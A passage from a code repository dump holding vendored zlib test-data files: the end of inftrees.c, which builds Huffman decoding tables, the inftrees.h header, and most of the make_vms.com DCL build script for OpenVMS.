count[MAXBITS+1]; /* number of codes of each length */ unsigned short offs[MAXBITS+1]; /* offsets in table for each length */ static const unsigned short lbase[31] = { /* Length codes 257..285 base */ 3, 4, 5, 6, 7, 8, 9, 10, 11, 13, 15, 17, 19, 23, 27, 31, 35, 43, 51, 59, 67, 83, 99, 115, 131, 163, 195, 227, 258, 0, 0}; static const unsigned short lext[31] = { /* Length codes 257..285 extra */ 16, 16, 16, 16, 16, 16, 16, 16, 17, 17, 17, 17, 18, 18, 18, 18, 19, 19, 19, 19, 20, 20, 20, 20, 21, 21, 21, 21, 16, 198, 203}; static const unsigned short dbase[32] = { /* Distance codes 0..29 base */ 1, 2, 3, 4, 5, 7, 9, 13, 17, 25, 33, 49, 65, 97, 129, 193, 257, 385, 513, 769, 1025, 1537, 2049, 3073, 4097, 6145, 8193, 12289, 16385, 24577, 0, 0}; static const unsigned short dext[32] = { /* Distance codes 0..29 extra */ 16, 16, 16, 16, 17, 17, 18, 18, 19, 19, 20, 20, 21, 21, 22, 22, 23, 23, 24, 24, 25, 25, 26, 26, 27, 27, 28, 28, 29, 29, 64, 64}; /* Process a set of code lengths to create a canonical Huffman code. The code lengths are lens[0..codes-1]. Each length corresponds to the symbols 0..codes-1. The Huffman code is generated by first sorting the symbols by length from short to long, and retaining the symbol order for codes with equal lengths. Then the code starts with all zero bits for the first code of the shortest length, and the codes are integer increments for the same length, and zeros are appended as the length increases. For the deflate format, these bits are stored backwards from their more natural integer increment ordering, and so when the decoding tables are built in the large loop below, the integer codes are incremented backwards. This routine assumes, but does not check, that all of the entries in lens[] are in the range 0..MAXBITS. The caller must assure this. 1..MAXBITS is interpreted as that code length. zero means that that symbol does not occur in this code. The codes are sorted by computing a count of codes for each length, creating from that a table of starting indices for each length in the sorted table, and then entering the symbols in order in the sorted table. The sorted table is work[], with that space being provided by the caller. The length counts are used for other purposes as well, i.e. finding the minimum and maximum length codes, determining if there are any codes at all, checking for a valid set of lengths, and looking ahead at length counts to determine sub-table sizes when building the decoding tables. */ /* accumulate lengths for codes (assumes lens[] all in 0..MAXBITS) */ for (len = 0; len <= MAXBITS; len++) count[len] = 0; for (sym = 0; sym < codes; sym++) count[lens[sym]]++; /* bound code lengths, force root to be within code lengths */ root = *bits; for (max = MAXBITS; max >= 1; max--) if (count[max] != 0) break; if (root > max) root = max; if (max == 0) { /* no symbols to code at all */ here.op = (unsigned char)64; /* invalid code marker */ here.bits = (unsigned char)1; here.val = (unsigned short)0; *(*table)++ = here; /* make a table to force an error */ *(*table)++ = here; *bits = 1; return 0; /* no symbols, but wait for decoding to report error */ } for (min = 1; min < max; min++) if (count[min] != 0) break; if (root < min) root = min; /* check for an over-subscribed or incomplete set of lengths */ left = 1; for (len = 1; len <= MAXBITS; len++) { left <<= 1; left -= count[len]; if (left < 0) return -1; /* over-subscribed */ } if (left > 0 && (type == CODES || max != 1)) return -1; /* incomplete set */ /* generate offsets into symbol table for each length for sorting */ offs[1] = 0; for (len = 1; len < MAXBITS; len++) offs[len + 1] = offs[len] + count[len]; /* sort symbols by length, by symbol order within each length */ for (sym = 0; sym < codes; sym++) if (lens[sym] != 0) work[offs[lens[sym]]++] = (unsigned short)sym; /* Create and fill in decoding tables. In this loop, the table being filled is at next and has curr index bits. The code being used is huff with length len. That code is converted to an index by dropping drop bits off of the bottom. For codes where len is less than drop + curr, those top drop + curr - len bits are incremented through all values to fill the table with replicated entries. root is the number of index bits for the root table. When len exceeds root, sub-tables are created pointed to by the root entry with an index of the low root bits of huff. This is saved in low to check for when a new sub-table should be started. drop is zero when the root table is being filled, and drop is root when sub-tables are being filled. When a new sub-table is needed, it is necessary to look ahead in the code lengths to determine what size sub-table is needed. The length counts are used for this, and so count[] is decremented as codes are entered in the tables. used keeps track of how many table entries have been allocated from the provided *table space. It is checked for LENS and DIST tables against the constants ENOUGH_LENS and ENOUGH_DISTS to guard against changes in the initial root table size constants. See the comments in inftrees.h for more information. sym increments through all symbols, and the loop terminates when all codes of length max, i.e. all codes, have been processed. This routine permits incomplete codes, so another loop after this one fills in the rest of the decoding tables with invalid code markers. */ /* set up for code type */ switch (type) { case CODES: base = extra = work; /* dummy value--not used */ match = 20; break; case LENS: base = lbase; extra = lext; match = 257; break; default: /* DISTS */ base = dbase; extra = dext; match = 0; } /* initialize state for loop */ huff = 0; /* starting code */ sym = 0; /* starting code symbol */ len = min; /* starting code length */ next = *table; /* current table to fill in */ curr = root; /* current table index bits */ drop = 0; /* current bits to drop from code for index */ low = (unsigned)(-1); /* trigger new sub-table when len > root */ used = 1U << root; /* use root table entries */ mask = used - 1; /* mask for comparing low */ /* check available table space */ if ((type == LENS && used > ENOUGH_LENS) || (type == DISTS && used > ENOUGH_DISTS)) return 1; /* process all codes and make table entries */ for (;;) { /* create table entry */ here.bits = (unsigned char)(len - drop); if (work[sym] + 1U < match) { here.op = (unsigned char)0; here.val = work[sym]; } else if (work[sym] >= match) { here.op = (unsigned char)(extra[work[sym] - match]); here.val = base[work[sym] - match]; } else { here.op = (unsigned char)(32 + 64); /* end of block */ here.val = 0; } /* replicate for those indices with low len bits equal to huff */ incr = 1U << (len - drop); fill = 1U << curr; min = fill; /* save offset to next table */ do { fill -= incr; next[(huff >> drop) + fill] = here; } while (fill != 0); /* backwards increment the len-bit code huff */ incr = 1U << (len - 1); while (huff & incr) incr >>= 1; if (incr != 0) { huff &= incr - 1; huff += incr; } else huff = 0; /* go to next symbol, update count, len */ sym++; if (--(count[len]) == 0) { if (len == max) break; len = lens[work[sym]]; } /* create new sub-table if needed */ if (len > root && (huff & mask) != low) { /* if first time, transition to sub-tables */ if (drop == 0) drop = root; /* increment past last table */ next += min; /* here min is 1 << curr */ /* determine length of next table */ curr = len - drop; left = (int)(1 << curr); while (curr + drop < max) { left -= count[curr + drop]; if (left <= 0) break; curr++; left <<= 1; } /* check for enough space */ used += 1U << curr; if ((type == LENS && used > ENOUGH_LENS) || (type == DISTS && used > ENOUGH_DISTS)) return 1; /* point entry in root table to sub-table */ low = huff & mask; (*table)[low].op = (unsigned char)curr; (*table)[low].bits = (unsigned char)root; (*table)[low].val = (unsigned short)(next - *table); } } /* fill in remaining table entry if code is incomplete (guaranteed to have at most one remaining entry, since if the code is incomplete, the maximum code length that was allowed to get this far is one bit) */ if (huff != 0) { here.op = (unsigned char)64; /* invalid code marker */ here.bits = (unsigned char)(len - drop); here.val = (unsigned short)0; next[huff] = here; } /* set return parameters */ *table += used; *bits = root; return 0; } ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/inftrees.h ================================================ /* inftrees.h -- header to use inftrees.c * Copyright (C) 1995-2005, 2010 Mark Adler * For conditions of distribution and use, see copyright notice in zlib.h */ /* WARNING: this file should *not* be used by applications. It is part of the implementation of the compression library and is subject to change. Applications should only use zlib.h. */ /* Structure for decoding tables. Each entry provides either the information needed to do the operation requested by the code that indexed that table entry, or it provides a pointer to another table that indexes more bits of the code. op indicates whether the entry is a pointer to another table, a literal, a length or distance, an end-of-block, or an invalid code. For a table pointer, the low four bits of op is the number of index bits of that table. For a length or distance, the low four bits of op is the number of extra bits to get after the code. bits is the number of bits in this code or part of the code to drop off of the bit buffer. val is the actual byte to output in the case of a literal, the base length or distance, or the offset from the current table to the next table. Each entry is four bytes. */ typedef struct { unsigned char op; /* operation, extra bits, table bits */ unsigned char bits; /* bits in this part of the code */ unsigned short val; /* offset in table or code value */ } code; /* op values as set by inflate_table(): 00000000 - literal 0000tttt - table link, tttt != 0 is the number of table index bits 0001eeee - length or distance, eeee is the number of extra bits 01100000 - end of block 01000000 - invalid code */ /* Maximum size of the dynamic table. The maximum number of code structures is 1444, which is the sum of 852 for literal/length codes and 592 for distance codes. These values were found by exhaustive searches using the program examples/enough.c found in the zlib distribution. The arguments to that program are the number of symbols, the initial root table size, and the maximum bit length of a code. "enough 286 9 15" for literal/length codes returns returns 852, and "enough 30 6 15" for distance codes returns 592. The initial root table size (9 or 6) is found in the fifth argument of the inflate_table() calls in inflate.c and infback.c. If the root table size is changed, then these maximum sizes would be need to be recalculated and updated. */ #define ENOUGH_LENS 852 #define ENOUGH_DISTS 592 #define ENOUGH (ENOUGH_LENS+ENOUGH_DISTS) /* Type of code to build for inflate_table() */ typedef enum { CODES, LENS, DISTS } codetype; int ZLIB_INTERNAL inflate_table(codetype type, unsigned short FAR *lens, unsigned codes, code FAR * FAR *table, unsigned FAR *bits, unsigned short FAR *work); ================================================ FILE: internal/scalibrextract/filesystem/vendored/testdata/thirdparty/zlib/make_vms.com ================================================ $! make libz under VMS written by $! Martin P.J. Zinser $! $! In case of problems with the install you might contact me at $! zinser@zinser.no-ip.info(preferred) or $! martin.zinser@eurexchange.com (work) $! $! Make procedure history for Zlib $! $!------------------------------------------------------------------------------ $! Version history $! 0.01 20060120 First version to receive a number $! 0.02 20061008 Adapt to new Makefile.in $! 0.03 20091224 Add support for large file check $! 0.04 20100110 Add new gzclose, gzlib, gzread, gzwrite $! 0.05 20100221 Exchange zlibdefs.h by zconf.h.in $! 0.06 20120111 Fix missing amiss_err, update zconf_h.in, fix new examples $! subdir path, update module search in makefile.in $! 0.07 20120115 Triggered by work done by Alexey Chupahin completely redesigned $! shared image creation $! 0.08 20120219 Make it work on VAX again, pre-load missing symbols to shared $! image $! 0.09 20120305 SMS. P1 sets builder ("MMK", "MMS", " " (built-in)). $! "" -> automatic, preference: MMK, MMS, built-in. $! $ on error then goto err_exit $! $ true = 1 $ false = 0 $ tmpnam = "temp_" + f$getjpi("","pid") $ tt = tmpnam + ".txt" $ tc = tmpnam + ".c" $ th = tmpnam + ".h" $ define/nolog tconfig 'th' $ its_decc = false $ its_vaxc = false $ its_gnuc = false $ s_case = False $! $! Setup variables holding "config" information $! $ Make = "''p1'" $ name = "Zlib" $ version = "?.?.?" $ v_string = "ZLIB_VERSION" $ v_file = "zlib.h" $ ccopt = "/include = []" $ lopts = "" $ dnsrl = "" $ aconf_in_file = "zconf.h.in#zconf.h_in#zconf_h.in" $ conf_check_string = "" $ linkonly = false $ optfile = name + ".opt" $ mapfile = name + ".map" $ libdefs = "" $ vax = f$getsyi("HW_MODEL").lt.1024 $ axp = f$getsyi("HW_MODEL").ge.1024 .and. f$getsyi("HW_MODEL").lt.4096 $ ia64 = f$getsyi("HW_MODEL").ge.4096 $! $! 2012-03-05 SMS. $! Why is this needed? And if it is needed, why not simply ".not. vax"? $! $!!! if axp .or. ia64 then set proc/parse=extended $! $ whoami = f$parse(f$environment("Procedure"),,,,"NO_CONCEAL") $ mydef = F$parse(whoami,,,"DEVICE") $ mydir = f$parse(whoami,,,"DIRECTORY") - "][" $ myproc = f$parse(whoami,,,"Name") + f$parse(whoami,,,"type") $! $! Check for MMK/MMS $! $ if (Make .eqs. "") $ then $ If F$Search ("Sys$System:MMS.EXE") .nes. "" Then Make = "MMS" $ If F$Type (MMK) .eqs. "STRING" Then Make = "MMK" $ else $ Make = f$edit( Make, "trim") $ endif $! $ gosub find_version $! $ open/write topt tmp.opt $ open/write optf 'optfile' $! $ gosub check_opts $! $! Look for the compiler used $! $ gosub check_compiler $ close topt $ close optf $! $ if its_decc $ then $ ccopt = "/prefix=all" + ccopt $ if f$trnlnm("SYS") .eqs. "" $ then $ if axp $ then $ define sys sys$library: $ else $ ccopt = "/decc" + ccopt $ define sys decc$library_include: $ endif $ endif $! $! 2012-03-05 SMS. $! Why /NAMES = AS_IS? Why not simply ".not. vax"? And why not on VAX? $! $ if axp .or. ia64 $ then $ ccopt = ccopt + "/name=as_is/opt=(inline=speed)" $ s_case = true $ endif $ endif $ if its_vaxc .or. its_gnuc $ then $ if f$trnlnm("SYS").eqs."" then define sys sys$library: $ endif $! $! Build a fake configure input header $! $ open/write conf_hin config.hin $ write conf_hin "#undef _LARGEFILE64_SOURCE" $ close conf_hin $! $! $ i = 0 $FIND_ACONF: $ fname = f$element(i,"#",aconf_in_file) $ if fname .eqs. "#" then goto AMISS_ERR $ if f$search(fname) .eqs. "" $ then $ i = i + 1 $ goto find_aconf $ endif $ open/read/err=aconf_err aconf_in 'fname' $ open/write aconf zconf.h $ACONF_LOOP: $ read/end_of_file=aconf_exit aconf_in line $ work = f$edit(line, "compress,trim") $ if f$extract(0,6,work) .nes. "#undef" $ then $ if f$extract(0,12,work) .nes. "#cmakedefine" $ then $ write aconf line $ endif $ else $ cdef = f$element(1," ",work) $ gosub check_config $ endif $ goto aconf_loop $ACONF_EXIT: $ write aconf "" $ write aconf "/* VMS specifics added by make_vms.com: */" $ write aconf "#define VMS 1" $ write aconf "#include " $ write aconf "#include " $ write aconf "#ifdef _LARGEFILE" $ write aconf "# define off64_t __off64_t" $ write aconf "# define fopen64 fopen" $ write aconf "# define fseeko64 fseeko" $ write aconf "# define lseek64 lseek" $ write aconf "# define ftello64 ftell" $ write aconf "#endif" $ write aconf "#if !defined( __VAX) && (__CRTL_VER >= 70312000)" $ write aconf "# define HAVE_VSNPRINTF" $ write aconf "#endif" $ close aconf_in $ close aconf $ if f$search("''th'") .nes. "" then delete 'th';* $! Build the thing plain or with mms $! $ write sys$output "Compiling Zlib sources ..." $ if make.eqs."" $ then $ if (f$search( "example.obj;*") .nes. "") then delete example.obj;* $ if (f$search( "minigzip.obj;*") .nes. "") then delete minigzip.obj;* $ CALL MAKE adler32.OBJ "CC ''CCOPT' adler32" - adler32.c zlib.h zconf.h $ CALL MAKE compress.OBJ "CC ''CCOPT' compress" - compress.c zlib.h zconf.h $ CALL MAKE crc32.OBJ "CC ''CCOPT' crc32" - crc32.c zlib.h zconf.h $ CALL MAKE deflate.OBJ "CC ''CCOPT' deflate" - deflate.c deflate.h zutil.h zlib.h zconf.h $ CALL MAKE gzclose.OBJ "CC ''CCOPT' gzclose" - gzclose.c zutil.h zlib.h zconf.h $ CALL MAKE gzlib.OBJ "CC ''CCOPT' gzlib" - gzlib.c zutil.h zlib.h zconf.h $ CALL MAKE gzread.OBJ "CC ''CCOPT' gzread" - gzread.c zutil.h zlib.h zconf.h $ CALL MAKE gzwrite.OBJ "CC ''CCOPT' gzwrite" - gzwrite.c zutil.h zlib.h zconf.h $ CALL MAKE infback.OBJ "CC ''CCOPT' infback" - infback.c zutil.h inftrees.h inflate.h inffast.h inffixed.h $ CALL MAKE inffast.OBJ "CC ''CCOPT' inffast" - inffast.c zutil.h zlib.h zconf.h inffast.h $ CALL MAKE inflate.OBJ "CC ''CCOPT' inflate" - inflate.c zutil.h zlib.h zconf.h infblock.h $ CALL MAKE inftrees.OBJ "CC ''CCOPT' inftrees" - inftrees.c zutil.h zlib.h zconf.h inftrees.h $ CALL MAKE trees.OBJ "CC ''CCOPT' trees" - trees.c deflate.h zutil.h zlib.h zconf.h $ CALL MAKE uncompr.OBJ "CC ''CCOPT' uncompr" - uncompr.c zlib.h zconf.h $ CALL MAKE zutil.OBJ "CC ''CCOPT' zutil" - zutil.c zutil.h zlib.h zconf.h $ write sys$output "Building Zlib ..." $ CALL MAKE libz.OLB "lib/crea libz.olb *.obj" *.OBJ $ write sys$output "Building example..." $ CALL MAKE example.OBJ "CC ''CCOPT' [.test]example" - [.test]example.c zlib.h zconf.h $ call make example.exe "LINK example,libz.olb/lib" example.obj libz.olb $ write sys$output "Building minigzip..." $ CALL MAKE minigzip.OBJ "CC ''CCOPT' [.test]minigzip" - [.test]minigzip.c zlib.h zconf.h $ call make minigzip.exe - "LINK minigzip,libz.olb/lib" - minigzip.obj libz.olb $ else $ gosub crea_mms $ write sys$output "Make ''name' ''version' with ''Make' " $ 'make' $ endif $! $! Create shareable image $! $ gosub crea_olist $ write sys$output "Creating libzshr.exe" $ call map_2_shopt 'mapfile' 'optfile' $ LINK_'lopts'/SHARE=libzshr.exe modules.opt/opt,'optfile'/opt $ write sys$output "Zlib build completed" $ delete/nolog tmp.opt;* $ exit $AMISS_ERR: $ write sys$output "No source for config.hin found." $ write sys$output "Tried any of ''aconf_in_file'" $ goto err_exit $CC_ERR: $ write sys$output "C compiler required to build ''name'" $ goto err_exit $ERR_EXIT: $ set message/facil/ident/sever/text $ close/nolog optf $ close/nolog topt $ close/nolog aconf_in $ close/nolog aconf $ close/nolog out $ close/nolog min $ close/nolog mod $ close/nolog h_in $ write sys$output "Exiting..." $ exit 2 $! $! $MAKE: SUBROUTINE !SUBROUTINE TO CHECK DEPENDENCIES $ V = 'F$Verify(0) $! P1 = What we are trying to make $! P2 = Command to make it $! P3 - P8 What it depends on $ $ If F$Search(P1) .Eqs. "" Then Goto Makeit $ Time = F$CvTime(F$File(P1,"RDT")) $arg=3 $Loop: $ Argument = P'arg $ If Argument .Eqs. "" Then Goto Exit $ El=0 $Loop2: $ File = F$Element(El," ",Argument) $ If File .Eqs. " " Then Goto Endl $ AFile = "" $Loop3: $ OFile = AFile $ AFile = F$Search(File) $ If AFile .Eqs. "" .Or. AFile .Eqs. OFile Then Goto NextEl $ If F$CvTime(F$File(AFile,"RDT")) .Ges. Time Then Goto Makeit $ Goto Loop3 $NextEL: $ El = El + 1 $ Goto Loop2 $EndL: $ arg=arg+1 $ If arg .Le. 8 Then Goto Loop $ Goto Exit $ $Makeit: $ VV=F$VERIFY(0) $ write sys$output P2 $ 'P2 $ VV='F$Verify(VV) $Exit: $ If V Then Set Verify $ENDSUBROUTINE $!------------------------------------------------------------------------------ $! $! Check command line options and set symbols accordingly $! $!------------------------------------------------------------------------------ $! Version history $! 0.01 20041206 First version to receive a number $! 0.02 20060126 Add new "HELP" target $ CHECK_OPTS: $ i = 1 $ OPT_LOOP: $ if i .lt. 9 $ then $ cparm = f$edit(p'i',"upcase") $! $! Check if parameter actually contains something $! $ if f$edit(cparm,"trim") .nes. "" $ then $ if cparm .eqs. "DEBUG" $ then $ ccopt = ccopt + "/noopt/deb" $ lopts = lopts + "/deb" $ endif $ if f$locate("CCOPT=",cparm) .lt. f$length(cparm) $ then $ start = f$locate("=",cparm) + 1 $ len = f$length(cparm) - start $ ccopt = ccopt + f$extract(start,len,cparm) $ if f$locate("AS_IS",f$edit(ccopt,"UPCASE")) .lt. f$length(ccopt) - then s_case = true $ endif $ if cparm .eqs. "LINK" then linkonly = true $ if f$locate("LOPTS=",cparm) .lt. f$length(cparm) $ then $ start = f$locate("=",cparm) + 1 $ len = f$length(cparm) - start $ lopts = lopts + f$extract(start,len,cparm) $ endif $ if f$locate("CC=",cparm) .lt. f$length(cparm) $ then $ start = f$locate("=",cparm) + 1 $ len = f$length(cparm) - start $ cc_com = f$extract(start,len,cparm) if (cc_com .nes. "DECC") .and. - (cc_com .nes. "VAXC") .and. - (cc_com .nes. "GNUC") $ then $ write sys$output "Unsupported compiler choice ''cc_com' ignored" $ write sys$output "Use DECC, VAXC, or GNUC instead" $ else $ if cc_com .eqs. "DECC" then its_decc = true $ if cc_com .eqs. "VAXC" then its_vaxc = true $ if cc_com .eqs. "GNUC" then its_gnuc = true $ endif $ endif $ if f$locate("MAKE=",cparm) .lt. f$length(cparm) $ then $ start = f$locate("=",cparm) + 1 $ len = f$length(cparm) - start $ mmks = f$extract(start,len,cparm) $ if (mmks .eqs. "MMK") .or. (mmks .eqs. "MMS") $ then $ make = mmks $ else $ write sys$output "Unsupported make choice ''mmks' ignored" $ write sys$output "Use MMK or MMS instead" $ endif $ endif $ if cparm .eqs. "HELP" then gosub bhelp $ endif $ i = i + 1 $ goto opt_loop $ endif $ return $!------------------------------------------------------------------------------ $! $! Look for the compiler used $! $! Version history $! 0.01 20040223 First version to receive a number $! 0.02 20040229 Save/set value of decc$no_rooted_search_lists $! 0.03 20060202 Extend handling of GNU C $! 0.04 20090402 Compaq -> hp $CHECK_COMPILER: $ if (.not. (its_decc .or. its_vaxc .or. its_gnuc)) $ then $ its_decc = (f$search("SYS$SYSTEM:DECC$COMPILER.EXE") .nes. "") $ its_vaxc = .not. its_decc .and. (F$Search("SYS$System:VAXC.Exe") .nes. "") $ its_gnuc = .not. (its_decc .or. its_vaxc) .and. (f$trnlnm("gnu_cc") .nes. "") $ endif $! $! Exit if no compiler available $! $ if (.not. (its_decc .or. its_vaxc .or. its_gnuc)) $ then goto CC_ERR $ else $ if its_decc $ then $ write sys$output "CC compiler check ... hp C" $ if f$trnlnm("decc$no_rooted_search_lists") .nes. "" $ then $ dnrsl = f$trnlnm("decc$no_rooted_search_lists") $ endif $ define/nolog decc$no_rooted_search_lists 1 $ else $ if its_vaxc then write sys$output "CC compiler check ... VAX C" $ if its_gnuc $ then $ write sys$output "CC compiler check ... GNU C" $ if f$trnlnm(topt) then write topt "gnu_cc:[000000]gcclib.olb/lib" $ if f$trnlnm(optf) then write optf "gnu_cc:[000000]gcclib.olb/lib" $ cc = "gcc" $ endif $ if f$trnlnm(topt) then write topt "sys$share:vaxcrtl.exe/share" $ if f$trnlnm(optf) then write optf "sys$share:vaxcrtl.exe/share" $ endif $ endif $ return $!------------------------------------------------------------------------------ $! $! If MMS/MMK are available dump out the descrip.mms if required $! $CREA_MMS: $ write sys$output "Creating descrip.mms..." $ create descrip.mms $ open/append out descrip.mms $ copy sys$input: out $ deck # descrip.mms: MMS description file for building zlib on VMS # written by Martin P.J. Zinser # OBJS = adler32.obj, compress.obj, crc32.obj, gzclose.obj, gzlib.obj\ gzread.obj, gzwrite.obj, uncompr.obj, infback.obj\ deflate.obj, trees.obj, zutil.obj, inflate.obj, \ inftrees.obj, inffast.obj $ eod $ write out "CFLAGS=", ccopt $ write out "LOPTS=", lopts $ write out "all : example.exe minigzip.exe libz.olb" $ copy sys$input: out $ deck @ write sys$output " Example applications available" libz.olb : libz.olb($(OBJS)) @ write sys$output " libz available" example.exe : example.obj libz.olb link $(LOPTS) example,libz.olb/lib minigzip.exe : minigzip.obj libz.olb link $(LOPTS) minigzip,libz.olb/lib clean : delete *.obj;*,libz.olb;*,*.opt;*,*.exe;* # Other dependencies. adler32.obj : adler32.c zutil.h zlib.h zconf.h compress.obj : compress.c zlib.h zconf.h crc32.obj : crc32.c zutil.h zlib.h zconf.h deflate.obj : deflate.c deflate.h zutil.h zlib.h zconf.h example.obj : [.test]example.c zlib.h zconf.h gzclose.obj : gzclose.c zutil.h zlib.h zconf.h gzlib.obj : gzlib.c zutil.h zlib.h zconf.h gzread.obj : gzread.c zutil.h zlib.h zconf.h gzwrite.obj : gzwrite.c zutil.h zlib.h zconf.h inffast.obj : inffast.c zutil.h zlib.h zconf.h inftrees.h inffast.h inflate.obj : inflate.c zutil.h zlib.h zconf.h inftrees.obj : inftrees.c zutil.h zlib.h zconf.h inftrees.h minigzip.obj : [.test]minigzip.c zlib.h zconf.h trees.obj : trees.c deflate.h zutil.h zlib.h zconf.h uncompr.obj : uncompr.c zlib.h zconf.h zutil.obj : zutil.c zutil.h zlib.h zconf.h infback.obj : infback.c zutil.h inftrees.h inflate.h inffast.h inffixed.h $ eod $ close out $ return $!------------------------------------------------------------------------------ $! $! Read list of core library sources from makefile.in and create options $! needed to build shareable image $! $CREA_OLIST: $ open/read min makefile.in $ open/write mod modules.opt $ src_check_list = "OBJZ =#OBJG =" $MRLOOP: $ read/end=mrdone min rec $ i = 0 $SRC_CHECK_LOOP: $ src_check = f$element(i, "#", src_check_list) $ i = i+1 $ if src_check .eqs. "#" then goto mrloop $ if (f$extract(0,6,rec) .nes. src_check) then goto src_check_loop $ rec = rec - src_check $ gosub extra_filnam $ if (f$element(1,"\",rec) .eqs. "\") then goto mrloop $MRSLOOP: $ read/end=mrdone min rec $ gosub extra_filnam $ if (f$element(1,"\",rec) .nes. "\") then goto mrsloop $MRDONE: $ close min $ close mod $ return $!------------------------------------------------------------------------------ $! $! Take record extracted in crea_olist and split it into single filenames $! $EXTRA_FILNAM: $ myrec = f$edit(rec - "\", "trim,compress") $ i = 0 $FELOOP: $ srcfil = f$element(i," ", myrec) $ if (srcfil .nes. " ") $ then $ write mod f$parse(srcfil,,,"NAME"), ".obj" $ i = i + 1 $ goto feloop $ endif $ return $!------------------------------------------------------------------------------ $! $! Find current Zlib version number $! $FIND_VERSION: $ open/read h_in 'v_file' $hloop: $ read/end=hdone h_in rec $ rec = f$edit(rec,"TRIM") $ if (f$extract(0,1,rec) .nes. "#") then goto hloop $ rec = f$edit(rec - "#", "TRIM") $ if f$element(0," ",rec) .nes. "define" then goto hloop $ if f$element(1," ",rec) .eqs. v_string $ then $ version = 'f$element(2," ",rec)' $ goto hdone $ endif $ goto hloop $hdone: $ close h_in $ return $!------------------------------------------------------------------------------ $! $CHECK_CONFIG: $! $ in_ldef = f$locate(cdef,libdefs) $ if (in_ldef .lt. f$length(libdefs)) $ then $ write aconf "#define ''cdef' 1" $ libdefs = f$extract(0,in_ldef,libdefs) + - f$extract(in_ldef + f$length(cdef) + 1, - f$length(libdefs) - in_ldef - f$length(cdef) - 1, - libdefs) $ else $ if (f$type('cdef') .eqs. "INTEGER") $ then $ write aconf "#define ''cdef' ", 'cdef' $ else $ if (f$type('cdef') .eqs. "STRING") $ then $ write aconf "#define ''cdef' ", """", '''cdef'', """" $ else $ gosub check_cc_def $ endif $ endif $ endif $ return $!------------------------------------------------------------------------------ $! $! Check if this is a define relating to the properties of the C/C++ $! compiler $! $ CHECK_CC_DEF: $ if (cdef .eqs. "_LARGEFILE64_SOURCE") $ then $ copy sys$input: 'tc' $ deck #include "tconfig" #define _LARGEFILE #include int main(){ FILE *fp; fp = fopen("temp.txt","r"); fseeko(fp,1,SEEK_SET); fclose(fp); } $ eod $ test_inv = false $ comm_h = false $ gosub cc_prop_check $ return $ endif $ write aconf "/* ", line, " */" $ return $!------------------------------------------------------------------------------ $! $! Check for properties of C/C++ compiler $! $! Version history $! 0.01 20031020 First version to receive a number $! 0.02 20031022 Added logic for defines with value $! 0.03 20040309 Make sure local config file gets not deleted $! 0.04 20041230 Also write include for configure run $! 0.05 20050103 Add processing of "comment defines" $CC_PROP_CHECK: $ cc_prop = true $ is_need = false $ is_need = (f$extract(0,4,cdef) .eqs. "NEED") .or. (test_inv .eq. true) $ if f$search(th) .eqs. "" then create 'th' $ set message/nofac/noident/nosever/notext $ on error then continue $ cc 'tmpnam' $ if .not. ($status) then cc_prop = false $ on error then continue $! The headers might lie about the capabilities of the RTL $ link 'tmpnam',tmp.opt/opt $ if .not. ($status) then cc_prop = false $ set message/fac/ident/sever/text $ on error then goto err_exit $ delete/nolog 'tmpnam'.*;*/exclude='th' $ if (cc_prop .and. .not. is_need) .or. - (.not. cc_prop .and. is_need) $ then $ write sys$output "Checking for ''cdef'... yes" $ if f$type('cdef_val'_yes) .nes. "" $ then $ if f$type('cdef_val'_yes) .eqs. "INTEGER" - then call write_config f$fao("#define !AS !UL",cdef,'cdef_val'_yes) $ if f$type('cdef_val'_yes) .eqs. "STRING" - then call write_config f$fao("#define !AS !AS",cdef,'cdef_val'_yes) $ else $ call write_config f$fao("#define !AS 1",cdef) $ endif $ if (cdef .eqs. "HAVE_FSEEKO") .or. (cdef .eqs. "_LARGE_FILES") .or. - (cdef .eqs. "_LARGEFILE64_SOURCE") then - call write_config f$string("#define _LARGEFILE 1") $ else $ write sys$output "Checking for ''cdef'... no" $ if (comm_h) $ then call write_config f$fao("/* !AS */",line) $ else $ if f$type('cdef_val'_no) .nes. "" $ then $ if f$type('cdef_val'_no) .eqs. "INTEGER" - then call write_config f$fao("#define !AS !UL",cdef,'cdef_val'_no) $ if f$type('cdef_val'_no) .eqs. "STRING" - then call write_config f$fao("#define !AS !AS",cdef,'cdef_val'_no) $ else $ call write_config f$fao("#undef !AS",cdef) $ endif $ endif $ endif $ return $!------------------------------------------------------------------------------ $! $! Check for properties of C/C++ compiler with multiple result values $! $! Version history $! 0.01 20040127 First version $! 0.02 20050103 Reconcile changes from cc_prop up to version 0.05 $CC_MPROP_CHECK: $ cc_prop = true $ i = 1 $ idel = 1 $ MT_LOOP: $ if f$type(result_'i') .eqs. "STRING" $ then $ set message/nofac/noident/nosever/notext $ on error then continue $ cc 'tmpnam'_'i' $ if .not. ($status) then cc_prop = false $ on error then continue $! The headers might lie about the capabilities of the RTL $ link 'tmpnam'_'i',tmp.opt/opt $ if .not. ($status) then cc_prop = false $ set message/fac/ident/sever/text $ on error then goto err_exit $ delete/nolog 'tmpnam'_'i'.*;* $ if (cc_prop) $ then $ write sys$output "Checking for ''cdef'... ", mdef_'i' $ if f$type(mdef_'i') .eqs. "INTEGER" - then call write_config f$fao("#define !AS !UL",cdef,mdef_'i') $ if f$type('cdef_val'_yes) .eqs. "STRING" - then call write_config f$fao("#define !AS !AS",cdef,mdef_'i') $ goto msym_clean $ else $ i = i + 1 $ goto mt_loop $ endif $ endif $ write sys$output "Checking for ''cdef'... no" $ call write_config f$fao("#undef !AS",cdef) $ MSYM_CLEAN: $ if (idel .le. msym_max) $ then $ delete/sym mdef_'idel' $ idel = idel + 1 $ goto msym_clean $ endif $ return $!------------------------------------------------------------------------------ $! $! Write configuration to both permanent and temporary config file $! $! Version history $! 0.01 20031029 First version to receive a number $! $WRITE_CONFIG: SUBROUTINE $ write aconf 'p1' $ open/append confh 'th' $ write confh 'p1' $ close confh $ENDSUBROUTINE $!------------------------------------------------------------------------------ $! $! Analyze the project map file and create the symbol vector for a shareable $! image from it $! $! Version history $! 0.01 20120128 First version $! 0.02 20120226 Add pre-load logic $! $ MAP_2_SHOPT: Subroutine $! $ SAY := "WRITE_ SYS$OUTPUT" $! $ IF F$SEARCH("''P1'") .EQS. "" $ THEN $ SAY "MAP_2_SHOPT-E-NOSUCHFILE: Error, inputfile ''p1' not available" $ goto exit_m2s $ ENDIF $ IF "''P2'" .EQS. "" $ THEN $ SAY "MAP_2_SHOPT: Error, no output file provided" $ goto exit_m2s $ ENDIF $! $ module1 = "deflate#deflateEnd#deflateInit_#deflateParams#deflateSetDictionary" $ module2 = 